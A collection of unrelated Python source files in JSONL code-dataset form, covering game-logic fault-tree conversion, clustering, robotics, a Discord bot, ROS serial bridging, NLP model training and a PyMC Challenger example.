'\\n'\n return s, i, gi, gateI, rg, bes\n elif (c == ' '):\n # process grammar, either event or command\n if (w == 'and'):\n # and gate\n if (g == 'and'):\n # add child to gate\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n elif (g == ''):\n # new gate\n s = s + '\\n'\n s = s + '\\n'\n s = s + '\\n'\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n gi = gi + 1\n else:\n # ambiguous grouping dependent on order of operations\n # don't handle this for now, throw an error to verify\n # this actually exists\n # AND has precedence in Python\n raise Exception('logic', 'ambiguous_and')\n g = 'and'\n w = ''\n elif (w == 'or'):\n # or gate\n if (g == 'or'):\n # add child to gate\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n elif (g == ''):\n # new gate\n s = s + '\\n'\n s = s + '\\n'\n s = s + '\\n'\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n gi = gi + 1\n else:\n # ambiguous grouping dependent on order of operations\n # don't handle this for now, throw an error to verify\n # this actually exists\n # AND has precedence in Python\n raise Exception('logic', 'ambiguous_or')\n g = 'or'\n 
w = ''\n else:\n # basic event\n be = w\n w = ''\n bes.append(be)\n elif (i == len(sLogic)):\n # last event in string, not recursed\n be = w\n bes.append(be)\n if (s == ''):\n # only one event in the logic, no gates\n s = sLogic\n else:\n if (gn == ''):\n s = s + '\\n'\n else:\n s = s + '\\n'\n gn = ''\n s = s + '\\n'\n s = s + '\\n'\n for og in rg:\n s = s + og\n md = buildEvents(bes)\n s = '\\n\\n\\n\\n' + s + '\\n\\n' + md + '\\n'\n return s\n else:\n w = w + c\n i = i + 1\n\ndef buildEvents(bes):\n s = ''\n for be in bes:\n if (be != ''):\n s = s + '\\n\\n\\n\\n'\n return s\n\ndef writeFaultTree(location, loc, rule, outpath):\n logic_ft = outpath + loc + '.xml'\n #logic_string = region_json[1]['locations']['Ice Cavern Iron Boots Chest']\n #logic_string = logic_string.replace('can_use(Dins_Fire)','(Dins_Fire and Magic_Meter)')\n logic_string = parseFunctions(rule)\n #print(logic_string)\n ft = buildGate(logic_string)\n with io.open(logic_ft, 'w') as f:\n f.write(ft)\n #print(ft)\n return logic_ft\n\nlogicDir = '../OoTR-5.1/data/World/'\nfile_path = logicDir + 'Deku Tree.json'\n\n#writeFaultTree(file_path,'./')","sub_path":"convertLogic.py","file_name":"convertLogic.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"142501345","text":"import os\nfrom statistics import mode\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport ClusteringAlgorithms\nimport DataSets\n\n\nclass OptimalNClusters:\n def __init__(self, clusteringAlgorithmList: list = ClusteringAlgorithms.clusteringAlgorithmList):\n \"\"\"\n init method.\n\n Args:\n clusteringAlgorithmList (list, optional): list of ClusteringAlgorithm objects for us to get the optimal NClusters of. 
Defaults to ClusteringAlgorithms.clusteringAlgorithmList.\n        \"\"\"\n        self.clusteringAlgorithmList = clusteringAlgorithmList\n\n    def runRandomStates(self, dataset, maxNClusters: int, randomStateList: list):\n        \"\"\"\n        Get the optimal number of clusters for each algorithm for every random state in the random state list, given the input data-set.\n        Saves the results in a CSV file.\n\n        Args:\n            dataset (DataSet object): the dataset we want to get the optimal number of clusters for.\n            maxNClusters (int): maximum number of clusters to check.\n            randomStateList (list): list of different random states\n        \"\"\"\n        randomStateNClustersDict = {}\n        for randomState in randomStateList:\n            randomStateNClustersDict[str(randomState)] = self.optimalNClusters(\n                dataset, maxNClusters, randomState)\n\n        resultDf = pd.DataFrame(randomStateNClustersDict)\n        maxFrequencyColumn = []\n        averageColumn = []\n        for _, row in resultDf.iterrows():\n            maxFrequencyColumn.append(mode(row))\n            averageColumn.append(np.mean(row))\n\n        resultDf['MostFrequent'] = maxFrequencyColumn\n        resultDf['Average'] = averageColumn\n\n        # ---------- Save results in a CSV file ----------\n        directory = os.path.join(\n            os.getcwd(), f\"Results\\\\Dataset{dataset.getDatasetIndex()}\\\\OptimalNClusters\")\n        try:\n            os.makedirs(directory)\n        except FileExistsError:\n            pass\n        resultDf.to_csv(\n            directory + f\"\\\\{maxNClusters}ClusterRange{len(randomStateList)}RandomStates.csv\")\n\n    def optimalNClusters(self, dataset, maxNClusters: int, randomState: int) -> dict:\n        \"\"\"\n        Calculate the optimal number of clusters for the dataset, with the input random state for each algorithm by taking the NClusters with the highest Silhouette score.\n        Saves the Silhouette score plot.\n        Returns a dict with each algorithm's name and optimal NClusters.\n\n        Args:\n            dataset (DataSet object): the dataset we want to get the optimal number of clusters for.\n            maxNClusters (int): maximum number of clusters to check.\n            randomState (int): integer representing a random state.\n\n        Returns:\n            dict: key - algorithm name, value - optimal NClusters.\n        \"\"\"\n\n        # key - algorithm name, value - list of silhouette scores for each nClusters\n        algoNameSillScoreDict = {}\n        algoNameMaxScoreDict = {}\n        nClustersRange = range(2, maxNClusters + 1)\n        for clusterAlgo in self.clusteringAlgorithmList:\n            sillScoreList = []\n            clusterAlgo.setDataFrame(dataset.getDataFrame())\n            for nClusters in nClustersRange:\n                print(\n                    f\"{clusterAlgo.getName()} Clustering dataset {dataset.getDatasetIndex()} with {nClusters} Clusters and Random state {randomState}\")\n                clusterAlgo.setNClusters(nClusters)\n                clusterAlgo.createLabels()\n                sillScore = clusterAlgo.getSilhouetteScore()\n                sillScoreList.append(sillScore)\n\n            algoNameSillScoreDict[clusterAlgo.getName()] = sillScoreList\n\n        for name, sillScoreList in algoNameSillScoreDict.items():\n            plt.plot(nClustersRange, sillScoreList, 'o-', label=name)\n            algoNameMaxScoreDict[name] = nClustersRange[np.argmax(\n                sillScoreList)]\n        plt.legend()\n        plt.title(\n            f\"Silhouette Score For Data-Set {dataset.getDatasetIndex()} With Random State {randomState}\")\n        plt.xlabel(\"Number Of Clusters\")\n        plt.ylabel(\"Silhouette Score\")\n\n        # ---------- Save Plot ----------\n        directory = os.path.join(\n            os.getcwd(), f\"Results\\\\Dataset{dataset.getDatasetIndex()}\\\\OptimalNClusters\")\n        try:\n            os.makedirs(directory)\n        except FileExistsError:\n            pass\n        plt.savefig(directory + f\"\\\\RandomState{randomState}.png\")\n        plt.close()\n        return algoNameMaxScoreDict\n\n\n# 10 most common random 
seeds.\nrandomStateList = [0, 1, 42, 1234, 10, 123, 2, 5, 12, 12345]\n\nonc = OptimalNClusters()\nfor ds in DataSets.dataSetList:\n ds.prepareDataset()\n onc.runRandomStates(ds, 10, randomStateList)\n","sub_path":"MidTermAssignment/Code/OptimalNClusters.py","file_name":"OptimalNClusters.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"650808003","text":"def solve(num):\n if num == 0:\n return \"INSOMNIA\"\n\n digits = [0] * 10\n start = num\n\n while True:\n s = str(num)\n for c in s:\n digits[int(c)] = 1\n\n if( good(digits) ):\n return num\n else:\n num += start\n\n\ndef good(arr):\n for i in arr:\n if i == 0:\n return False\n return True\n\ncases = int(input())\nfor i in range(cases):\n case = int(input())\n print(\"Case #{}: {}\".format(i+1, solve(case)))\n","sub_path":"codes/CodeJamCrawler/16_0_1/mtcliatt/second_small.py","file_name":"second_small.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554985736","text":"# ----------------------------------------------------------------------------\n# pyglet\n# Copyright (c) 2006-2008 Alex Holkner\n# Copyright (c) 2008-2020 pyglet contributors\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of pyglet nor the names of its\n# contributors may be used to endorse or promote products\n# derived from this software without specific prior written\n# permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n# ----------------------------------------------------------------------------\n\nimport pyglet\nfrom pyglet.gl import *\n\njoysticks = pyglet.input.get_joysticks()\nassert joysticks, 'No joystick device is connected'\njoystick = joysticks[0]\njoystick.open()\n\nwindow = pyglet.window.Window(width=800, height=800)\nbatch = pyglet.graphics.Batch()\n\n# Labels\npyglet.text.Label(\"Buttons:\", x=15, y=window.height - 25, font_size=14, batch=batch)\npyglet.text.Label(\"D Pad:\", x=window.width - 125, y=window.height - 25, font_size=14, batch=batch)\n\n\nbutton_labels = []\nbutton_shapes = []\n\nfor i in range(len(joystick.buttons)):\n rows = len(joystick.buttons) // 2\n y = window.height - 50 - 25 * (i % rows)\n x = 35 + 60 * (i // rows)\n label = pyglet.text.Label(f\"{i}:\", x=x, y=y, font_size=14, anchor_x='right', batch=batch)\n button_labels.append(label)\n shape = pyglet.shapes.Rectangle(x + 10, y + 1, 10, 10, color=(255, 0, 0), batch=batch)\n button_shapes.append(shape)\n\n\njoystick_rect = pyglet.shapes.Rectangle(window.width // 2, window.height // 2, 10, 10, color=(255, 0, 255), batch=batch)\njoystick_rect.anchor_position = joystick_rect.width // 2, joystick_rect.height // 2\nd_pad_rect = pyglet.shapes.Rectangle(window.width - 75, window.height - 100, 10, 10, color=(0, 0, 255), batch=batch)\n\n\n@window.event\ndef on_draw():\n window.clear()\n batch.draw()\n x = round((.5 * joystick.x + 1), 2) * window.width / 2\n y = round((-.5 * joystick.y + 1), 2) * window.height / 2\n rx = (.5 * joystick.rx + 1) * 60\n ry = (-.5 * joystick.ry + 1) * 60\n z = joystick.z * 50\n\n # Axes\n joystick_rect.position = x, y\n joystick_rect.anchor_position = joystick_rect.width // 2, joystick_rect.height // 2\n joystick_rect.width = 10 + rx + z\n joystick_rect.height = 10 + ry + z\n\n # Buttons\n for i in range(len(joystick.buttons)):\n rect = button_shapes[i]\n rect.color = (0, 255, 0) if joystick.buttons[i] else (255, 0, 0)\n\n # Hat\n d_pad_x = window.width - 100 + joystick.hat_x * 50\n d_pad_y = window.height - 100 + joystick.hat_y * 50\n d_pad_rect.position = d_pad_x, d_pad_y\n\n\npyglet.app.run()\n","sub_path":"examples/input/joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":3824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"269822290","text":"\nimport robot_controller as robo\nimport time\nimport ev3dev.ev3 as ev3\n\n\ndef main():\n # beacon_seeker = ev3.BeaconSeeker(channel=1)\n ir_sensor = ev3.InfraredSensor()\n assert ir_sensor.connected\n robot = robo.Snatch3r()\n # dis = beacon_seeker.distance\n ev3.Sound.speak(\"picked up all rubbish\").wait()\n\n a = 0\n while True:\n distance = ir_sensor.proximity\n print(distance)\n # print(dis)\n if distance < 15:\n speed = 900\n robot.arm_motor.run_forever(speed_sp=speed)\n while True:\n if robot.touch_sensor.is_pressed:\n robot.arm_motor.stop(stop_action='hold')\n ev3.Sound.speak(\"in position\").wait()\n break\n 
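           # run_to_rel_pos() below reverses the lift by a fixed -5112 encoder ticks\n            # (this looks like the full arm travel for this Snatch3r build), and the\n            # time.sleep(10) that follows crudely waits for the move to finish; if this\n            # ev3dev version provides it, polling the motor state would be tighter, e.g.:\n            #     robot.arm_motor.wait_while('running')\n            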
robot.arm_motor.run_to_rel_pos(position_sp=-5112, speed_sp=-800)\n time.sleep(10)\n ev3.Sound.speak(\"done\").wait()\n time.sleep(1)\n a = a + 1\n if a == 20:\n break\n\n\nmain()\n","sub_path":"projects/Jun Fan/arm_solve.py","file_name":"arm_solve.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"25247804","text":"from tempfile import TemporaryDirectory\n\nfrom summer.model import StratifiedModel\n\nfrom autumn.plots import plot_scenarios\nfrom autumn.tool_kit import Scenario, get_integration_times\nfrom autumn.constants import Compartment, Stratification\n\n\ndef test_for_smoke__plot_scenarios():\n \"\"\"\n Smoke test plot_scenarios to ensure it runs without crashing.\n Does not test all code execution paths - eg. no generated outputs.\n \"\"\"\n plot_config = {\n \"translations\": {},\n \"outputs_to_plot\": [],\n }\n # Build and run scenarios\n params = {\"default\": {}, \"scenario_start_time\": 2002, \"scenarios\": {1: {}}}\n scenarios = [\n Scenario(_build_model, 0, params),\n Scenario(_build_model, 1, params),\n ]\n scenarios[0].run()\n scenarios[1].run(base_model=scenarios[0].model)\n with TemporaryDirectory() as tmp_out_dir:\n plot_scenarios(scenarios, tmp_out_dir, plot_config)\n\n\ndef _build_model(*args, **kwargs):\n pop = 1000\n model = StratifiedModel(\n times=get_integration_times(2000, 2005, 1),\n compartment_types=[Compartment.SUSCEPTIBLE, Compartment.INFECTIOUS],\n initial_conditions={Compartment.SUSCEPTIBLE: pop},\n parameters={},\n requested_flows=[],\n starting_population=pop,\n )\n # Add basic age stratification\n model.stratify(\n Stratification.AGE,\n strata_request=[0, 5, 15, 60],\n compartment_types_to_stratify=[],\n requested_proportions={},\n )\n return model\n","sub_path":"tests/test_plotting.py","file_name":"test_plotting.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"99717412","text":"from sys import stdin\n\ndef solutions(n, f, s):\n if n > 2:\n tmp = f\n f += s\n s = tmp\n return solutions(n-1, f, s)\n else:\n return f+s\n\nf, s = 1, 0\nprint(solutions(int(stdin.readline().rstrip()), f, s))","sub_path":"02. 재귀_특별_풀이(훈련)/solutions/1915. (재귀함수) 피보나치 수열.py","file_name":"1915. (재귀함수) 피보나치 수열.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213220958","text":"import os\nimport shutil\n\nimport jina.proto.jina_pb2 as jina_pb2\nfrom google.protobuf.json_format import MessageToJson\nfrom jina.executors.indexers import BaseIndexer\n\nfrom .. 
import LevelDBIndexer\n\ncur_dir = os.path.dirname(os.path.abspath(__file__))\n\n\ndef rm_files(file_paths):\n for file_path in file_paths:\n if os.path.exists(file_path):\n if os.path.isfile(file_path):\n os.remove(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path, ignore_errors=False, onerror=None)\n\n\ndef run_test(indexer):\n def create_document(doc_id, text, weight, length):\n d = jina_pb2.Document()\n d.id = doc_id\n d.buffer = text.encode('utf8')\n d.weight = weight\n d.length = length\n return d\n\n with indexer as idx:\n data = {\n 'd1': MessageToJson(create_document(1, 'cat', 0.1, 3)),\n 'd2': MessageToJson(create_document(2, 'dog', 0.2, 3)),\n 'd3': MessageToJson(create_document(3, 'bird', 0.3, 3)),\n }\n idx.add(data)\n idx.touch()\n idx.save()\n save_abspath = idx.save_abspath\n index_abspath = idx.index_abspath\n assert os.path.exists(index_abspath)\n assert os.path.exists(save_abspath)\n\n with BaseIndexer.load(save_abspath) as searcher:\n doc = searcher.query('d2')\n assert doc.id == 2\n assert doc.length == 3\n\n rm_files([save_abspath, index_abspath])\n\n\ndef test_add_query():\n indexer = LevelDBIndexer(level='doc', index_filename='leveldb.db')\n run_test(indexer)\n\n\ndef test_load_yaml():\n from jina.executors import BaseExecutor\n indexer = BaseExecutor.load_config(os.path.join(cur_dir, 'yaml/test-leveldb.yml'))\n run_test(indexer)\n","sub_path":"indexers/keyvalue/LevelDBIndexer/tests/test_leveldbindexer.py","file_name":"test_leveldbindexer.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"52939054","text":"import time\nimport RPi.GPIO as GPIO\nimport os\nrun_yolo = 'bash /home/pi/charlie.sh'\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(3, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\nwhile(True):\n while(True):\n x = GPIO.input(3)\n if(x == 0):\n break\n\n print('pressed')\n time.sleep(1)\n os.system(run_yolo)\n \n\n while(True):\n x = GPIO.input(3)\n if (x == 1):\n break\n print('not pressed')\n time.sleep(1)\n\n","sub_path":"GPIO/GPIO.py","file_name":"GPIO.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"419811692","text":"#!/usr/bin/env python\n\n\"\"\" Serial interface node between Arduino and ROS.\nMade for Robotics course IAS0220 \"Robotite juhtimine ja tarkvara\", August 2020, CfB, Kilian Ochs\n\nReceives Serial messages from Arduino and forwards them as ROS messages.\nThe code receives distance and IMU Euler angles from Arduino and publishes them as Integer and PoseStamped (Quaternion) messages.\n\"\"\"\nimport rospy\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import PoseStamped\nimport serial\nimport time\n#import tf2_ros\nimport tf_conversions\nimport math\n\nclass SerialInterface():\n\tport = \"/dev/ttyUSB0\" # Arduino Nano seems to use ttyUSB0, some other Arduino boards might use ttyAMA0\n\tbaudrate = 115200 # [bps]\n\theartbeat = 0.1 # [seconds] How fast we're reading the serial buffer and sending messages over to ROS\n\tstartSignature = \"##\"\n\tendSignature = \"\\n\"\n\tnumData = 4 # Number of fields contained in message from Arduino\n\tseqID = 0\n\t\n\t# Class constructor #\n\tdef __init__(self):\n\t\trospy.loginfo('Initializing SerialInterface node.')\n\t\trospy.init_node('SerialInterface', anonymous=True)\n\t\tself.ser = 
serial.Serial(self.port,self.baudrate,parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS,timeout = 0)\n\t\trospy.loginfo('Connected to: \"%s\"' % self.ser.portstr)\n\t\tself.pub_distance = rospy.Publisher('distance', Int16, queue_size=10)\n\t\tself.pub_imu = rospy.Publisher('imu_quaternions', PoseStamped, queue_size=10)\n\t\tself.distanceCm = Int16()\n\t\tself.imu = PoseStamped()\n\t\trospy.loginfo('SerialInterface node initialized.')\n\t\t\n\t# Reads serial messages from Arduino and forwards them as ROS messages #\n\tdef bridge(self):\n\t\tdata = self.ser.read(9999)\n\t\tmsg = str(data)\n\t\tlastIndexStart = msg.rfind(self.startSignature)\n\t\tlastIndexStop = msg.rfind(self.endSignature)\n\t\tresultList = []\n\t\tif lastIndexStop > lastIndexStart :\n\t\t\tresultMsg = msg[lastIndexStart+len(self.startSignature) : lastIndexStop]\n\t\t\trospy.loginfo('Parsed data: \"%s\"' % resultMsg)\n\t\t\tresultList = resultMsg.split(';',self.numData)\n\t\t\tif len(resultList) == self.numData :\n\t\t\t\ttry:\n\t\t\t\t\tself.distanceCm.data = int(resultList[0])\n\t\t\t\t\troll = float(resultList[1])\n\t\t\t\t\tpitch = float(resultList[2])\n\t\t\t\t\tyaw = float(resultList[3])\n\t\t\t\t\trospy.loginfo('Distance [cm]: %d' % self.distanceCm.data)\n\t\t\t\t\trospy.loginfo('Roll [deg]: %.2f' % roll)\n\t\t\t\t\trospy.loginfo('Pitch [deg]: %.2f' % pitch)\n\t\t\t\t\trospy.loginfo('Yaw [deg]: %.2f' % yaw)\n\t\t\t\t\trospy.loginfo(\"------------------------\")\n\t\t\t\t\tself.imu.header.seq = self.seqID\n\t\t\t\t\tself.seqID += 1\n\t\t\t\t\tself.imu.header.stamp = rospy.Time.now()\n\t\t\t\t\tself.imu.header.frame_id = \"FrameID\"\n\t\t\t\t\tself.imu.pose.position.x = 0.0\n\t\t\t\t\tself.imu.pose.position.y = 0.0\n\t\t\t\t\tself.imu.pose.position.z = 0.0\n\t\t\t\t\troll_rad = math.radians(roll)\n\t\t\t\t\tpitch_rad = math.radians(pitch)\n\t\t\t\t\tyaw_rad = math.radians(yaw)\n\t\t\t\t\tq = tf_conversions.transformations.quaternion_from_euler(roll_rad, pitch_rad, yaw_rad)\n\t\t\t\t\tself.imu.pose.orientation.x = q[0]\n\t\t\t\t\tself.imu.pose.orientation.y = q[1]\n\t\t\t\t\tself.imu.pose.orientation.z = q[2]\n\t\t\t\t\tself.imu.pose.orientation.w = q[3]\n\n\t\t\t\texcept ValueError:\n\t\t\t\t\trospy.logwarn(\"Received message contains invalid values.\")\n\t\t\telse:\n\t\t\t\trospy.logwarn(\"Received message has invalid format.\")\n\t\telse:\n\t\t\trospy.logwarn(\"No valid message found in buffer.\")\n\t\tself.pub_distance.publish(self.distanceCm)\n\t\tself.pub_imu.publish(self.imu)\n\n\ndef main(args=None):\n\tserialInterface = SerialInterface()\n\twhile(not rospy.is_shutdown()):\n\t\tserialInterface.bridge()\n\t\trospy.sleep(serialInterface.heartbeat)\n\tserialInterface.ser.close()\n\trospy.loginfo('Closed serial port.')\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Python ROS node/_deprecated/serial_interface_ros_publish_quaternions.py","file_name":"serial_interface_ros_publish_quaternions.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483997928","text":"import pandas as pd\nimport numpy as np\nimport argparse\n\ntry:\n    from tlp.text_processing.util import pre_process_nli_df, get_corpus\n    from tlp.text_processing.util import remove_stopwords_data, stemm_data\n    from tlp.training.util import filter_df_by_label, get_binary_label\n    from tlp.text_processing.util import stopword_premisse\n    from tlp.text_processing.util import stopword_hypothesis\n    from 
tlp.text_processing.util import invert\n from tlp.text_processing.util import label_internalization\n from tlp.text_processing.structural_properties import contrapositive\n from tlp.text_processing.structural_properties import implication_introduction\n from tlp.text_processing.util import transformation2augmentation\n from tlp.training.language_representation import Tfidf\n from tlp.models.logistic_regression import LRWrapper\n\nexcept ModuleNotFoundError:\n from src.tlp.text_processing.util import pre_process_nli_df, get_corpus\n from src.tlp.text_processing.util import remove_stopwords_data, stemm_data\n from src.tlp.training.util import filter_df_by_label, get_binary_label\n from src.tlp.text_processing.util import stopword_premisse\n from src.tlp.text_processing.util import stopword_hypothesis\n from src.tlp.text_processing.util import invert\n from src.tlp.text_processing.util import label_internalization\n from src.tlp.text_processing.structural_properties import contrapositive\n from src.tlp.text_processing.structural_properties import implication_introduction\n from src.tlp.text_processing.util import transformation2augmentation\n from src.tlp.training.language_representation import Tfidf\n from src.tlp.models.logistic_regression import LRWrapper\n\n\ndef train(train_path,\n use_stemmer,\n remove_stopwords,\n model_path,\n cv,\n C_bound,\n transformation,\n pct,\n verbose=1):\n\n hyperparams = {}\n hyperparams[\"RepresentationFunction\"] = Tfidf\n hyperparams[\"max_features\"] = None\n hyperparams[\"label_translation\"] = get_binary_label\n hyperparams[\"param_grid\"] = {'penalty': ['l1', 'l2'],\n 'C': np.logspace(0, 4, C_bound),\n 'solver': ['liblinear']}\n hyperparams[\"cv\"] = cv\n hyperparams[\"verbose\"] = verbose\n\n # Data prepossessing\n\n df_train = pd.read_csv(train_path)\n df_train = filter_df_by_label(df_train.dropna())\n if pct > 0:\n frac = pct / 100\n df_train = transformation2augmentation(df=df_train,\n transformation=transformation,\n frac=frac)\n\n if use_stemmer:\n df_train = stemm_data(df_train)\n\n if remove_stopwords:\n df_train = remove_stopwords_data(df_train)\n\n pre_process_nli_df(df_train)\n if verbose > 0:\n print(\"\\nTrain data shape = {}\\n\".format(df_train.shape))\n\n # Training\n\n lrw = LRWrapper(hyperparams)\n lrw.fit(df_train)\n\n # Saving\n\n lrw.save(model_path)\n\n if verbose > 0:\n print(\"= Training results =\\n\")\n print(\n 'Best penalty:',\n lrw.model.best_estimator_.get_params()['penalty'])\n print('Best C:', lrw.model.best_estimator_.get_params()['C'])\n\n\ndef main():\n msg = \"\"\"Grid search for logistic resgression\"\"\"\n parser = argparse.ArgumentParser(description=msg)\n\n parser.add_argument('train_path',\n type=str,\n help='path to train csv')\n\n parser.add_argument('model_path',\n type=str,\n help='path to save the trained model')\n\n parser.add_argument(\"-t\",\n \"--transformation\",\n type=str,\n default='contra',\n help=\"transformation (default='contrapositive')\")\n\n parser.add_argument(\"-use_stemmer\",\n \"--use_stemmer\",\n action=\"store_true\",\n default=False,\n help=\"Use stemm version of the text data (default=False)\")\n\n parser.add_argument(\"-remove_stopwords\",\n \"--remove_stopwords\",\n action=\"store_true\",\n default=False,\n help=\"Remove stopwords from the text data (default=False)\")\n\n parser.add_argument(\"-C_bound\",\n \"--C_bound\",\n type=int,\n default=5,\n help=\"Number of examples of the param C (default=5)\") # noqa\n\n parser.add_argument(\"-cv\",\n \"--cv\",\n type=int,\n default=3,\n 
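# Default of 3 folds mirrors scikit-learn's old GridSearchCV default.\n                        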
help=\"The number of folds in a (Stratified)KFold (default=3)\") # noqa\n\n parser.add_argument(\"-pct\",\n \"--pct\",\n type=float,\n default=0,\n help=\"percentage of transformation added to training data (default=0)\") # noqa\n\n args = parser.parse_args()\n\n transformation_map = {\"contra\": contrapositive,\n 'ii': implication_introduction,\n \"invert\": invert,\n \"sh\": stopword_hypothesis,\n \"sp\": stopword_premisse,\n \"li\": label_internalization}\n\n transformation = transformation_map[args.transformation]\n\n train(train_path=args.train_path,\n use_stemmer=args.use_stemmer,\n remove_stopwords=args.remove_stopwords,\n model_path=args.model_path,\n cv=args.cv,\n C_bound=args.C_bound,\n transformation=transformation,\n pct=args.pct)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/lr_grid_search.py","file_name":"lr_grid_search.py","file_ext":"py","file_size_in_byte":5834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"424935675","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport datetime\nimport sys\nfrom discord import Client, Message\nfrom commands import commands, log\n\nclient = Client()\n\ndef error(message: Message) -> Message:\n err_msg = \"Error: invalid command '%s'\" % message.content\n return client.send_message(message.channel, err_msg)\n\n@client.event\nasync def on_message(message: Message) -> None:\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n # we only accept commands starting with '!'\n if message.content[0] != \"!\":\n return\n cmd_with_args = message.content.split(\" \")\n cmd = cmd_with_args[0][1:]\n args = [arg for arg in cmd_with_args[1:] if arg != \"\"]\n if cmd in commands:\n await commands[cmd](client, message, args)\n else:\n await error(message)\n\nif __name__ == '__main__':\n try:\n log.write_to_log_file('Bot started')\n token = sys.argv[1]\n client.run(token)\n except Exception as e:\n log.write_to_log_file(e)\n","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"284962380","text":"'''Example of PyMC - The Challenger Disaster\n'''\n\n# author: Thomas Haslwanter, date: Sept-2013\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport pandas as pd\nimport seaborn as sns\nimport os\nimport pymc as pm\n\ndef logistic(x, beta, alpha=0):\n return 1.0 / (1.0 + np.exp(np.dot(beta, x) + alpha))\n\nsns.set_context('poster')\n\n# --- Get and show the O-ring data ---\ndataDir = r'..\\Data\\data_bayes'\ninFile = os.path.join(dataDir, 'challenger_data.csv')\n\nchallenger_data = np.genfromtxt(inFile, skip_header=1, usecols=[1, 2],\n missing_values='NA', delimiter=',')\n\n# drop the NA values\nchallenger_data = challenger_data[~np.isnan(challenger_data[:, 1])]\n\n# plot it, as a function of tempature (the first column)\nprint(\"Temp (F), O-Ring failure?\")\nprint(challenger_data)\n\n# First plot\nplt.figure()\nnp.set_printoptions(precision=3, suppress=True)\n\nplt.scatter(challenger_data[:, 0], challenger_data[:, 1], s=75, color=\"k\",\n alpha=0.5)\nplt.yticks([0, 1])\nplt.ylabel(\"Damage Incident?\")\nplt.xlabel(\"Outside temperature (Fahrenheit)\")\nplt.title(\"Defects of the Space Shuttle O-Rings vs temperature\")\n\ncurDir = os.path.abspath(os.path.curdir)\noutFile = 'Challenger_ORings.png'\nplt.tight_layout\nplt.savefig(outFile, dpi=200)\nprint('Data written to 
